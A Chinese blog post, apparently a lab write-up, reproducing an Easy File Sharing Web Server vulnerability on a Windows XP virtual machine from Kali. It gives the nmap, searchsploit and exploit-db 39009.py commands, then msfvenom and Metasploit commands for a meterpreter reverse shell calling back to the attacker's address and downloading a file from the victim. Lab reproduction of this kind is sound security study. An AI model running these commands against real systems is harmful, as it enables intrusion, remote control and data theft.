easy file sharing server 漏洞复现

文章目录

  • 实验步骤


二、实验步骤

1:将解压好的easy file sharing web server 拖进xp中安装

2:在xp中打开easy file sharing

3:打开kali 输入ifconfig 并扫描位于同一网段下的存活的主机和其开放的端口

4:使用命令nmap -sV 192.168.179.131 扫描开放端口服务的版本信息

5:使用命令searchsploit easy file sharing 查找渗透模块

6:运行python脚本

路径:/usr/share/exploitdb/windows/remote/39009.py
命令:python /usr/share/exploitdb/windows/remote/39009.py 192.168.179.131 8080

7打开xp靶机即可看到计算器被调用了。

2:

在kali终端中输入msfvenom -p windows/meterpreter/reverse_tcp lhost =192.168.179.132(kali的ip) lport=5000 -f exe -o /home/kali/payload.exe

将生成的payload.exe 拖到xp虚拟机中

在kali终端中输入msfconsole打开metasploit

使用攻击模块,在kali终端中输入

Use exploit/multi/handler

Set payload windows/meterpreter/reverse_tcp

Set lhost 192.168.179.132

Set lport 5000

Exploit

在xp中运行生成的payload

Kali连接上xp

这里事先在xp的c盘下新建了一个名为hacker.txt文件

使用命令download c:\\test.txt

以root打开kali 在root中可以看到下载的test.txt文件

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值